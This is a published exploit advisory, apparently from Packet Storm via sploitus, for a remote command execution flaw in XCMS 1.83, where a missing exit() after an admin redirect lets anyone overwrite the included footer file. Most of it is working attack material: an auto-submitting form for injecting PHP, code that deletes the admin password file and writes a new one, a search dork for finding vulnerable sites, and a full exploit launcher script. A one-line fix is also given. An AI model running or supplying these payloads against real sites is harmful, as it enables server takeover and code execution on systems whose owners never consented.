Exploit for XCMS 1.83 Remote Command Execution

Name: Exploit for XCMS 1.83 Remote Command Execution
Rating: 5 (661 reviews)
2023-04-03 | CVSS 6.8
## https://sploitus.com/exploit?id=PACKETSTORM:171630
Exploit Title: XCMS v1.83 - Remote Command Execution (RCE)  
Author: Onurcan  
Email: onurcanalcan@gmail.com  
Site: ihteam.net  
Script Download : http://www.xcms.it  
Date: 26/12/2022  
  
The xcms's footer(that is in "/dati/generali/footer.dtb") is included in each page of the xcms.  
Taking "home.php" for example:  
  
<?php  
//home.php  
[...]  
include(CSTR."footer".STR); // <- "CSTR" and "STR" are the constants previously declared. They refers to "/dati/generali" and "dtb"  
?>  
  
So the xcms allow you to modify the footer throught a bugged page called cpie.php included in the admin panel.  
So let's take a look to the bugged code.  
  
<?php  
//cpie.php  
[...]  
if(isset($_SESSION['logadmin'])===false){ header("location:index.php"); } // <- so miss an exit() :-D  
[...]  
if(isset($_POST['salva'])){  
Scrivi(CGEN."footer".DTB,stripslashes($_POST['testo_0'])); // <- save the changements without any kind of control  
}   
[...]  
?>  
  
So with a simple html form we can change the footer.  
Ex:  
  
<form name="editor" action="http://[SITE_WITH_XCMS]/index.php?lng=it&pg=admin&s=cpie" method="post">  
<input type="hidden" name="salva" value="OK" />  
<textarea name="testo_0"><?php YOUR PHP CODE ?></textarea>  
<input type="submit" value="Modifica" />  
</form>  
<script>document.editor.submit()</script>  
  
Note: This is NOT a CSRF, this is just an example to change the footer without the admin credentials.  
  
  
  
Trick: We can change the admin panel password by inserting this code in the footer:  
  
<?php  
$pwd = "owned"; // <- Place here your new password.  
$pwd2 = md5($pwd);  
unlink("dati/generali/pass.php");  
$f = fopen("dati/generali/pass.php",w);  
fwrite($f,"<?php \$mdp = \"$pwd2\"; ?>");  
fclose($f);  
?>  
  
This code delete the old password file and then create a new one with your new password.  
  
  
Fix:  
  
<?php  
//cpie.php  
[...]  
if(isset($_SESSION['logadmin'])===false){ header("location:index.php"); exit(); } // with an exit() we can fix the bug.  
[...]  
if(isset($_POST['salva'])){  
Scrivi(CGEN."footer".DTB,stripslashes($_POST['testo_0'])); // <- save the changements without any kind of control  
}   
[...]  
?>  
  
So this is a simple exploit:  
  
  
<?php  
if(isset($_POST['send']) and isset($_POST['code']) and isset($_POST['site'])){  
echo "  
<form name=\"editor\" action=\"http://".$_POST['site']."/index.php?lng=it&pg=admin&s=cpie\" method=\"post\">  
<input type=\"hidden\" name=\"salva\" value=\"OK\" />  
<textarea name=\"testo_0\">".$_POST['code']."</textarea>  
<input type=\"submit\" value=\"Modifica\" />  
</form>  
<script>document.editor.submit()</script>";  
}else{  
echo"  
<pre>  
XCMS <= v1.82 Remote Command Execution Vulnerability  
Dork : inurl:\"mod=notizie\"  
by Onurcan  
Visit ihteam.net  
</pre>  
<form method=POST action=".$_POST['PHP_SELF'].">  
<pre>  
Site :  
<input type=text name=site />  
Code :  
<textarea name=code cols=49 rows=14>Your code here</textarea>  
<input type=submit value=Exploit />  
<input type=hidden name=\"send\" />  
</pre>  
</form>";   
}   
?>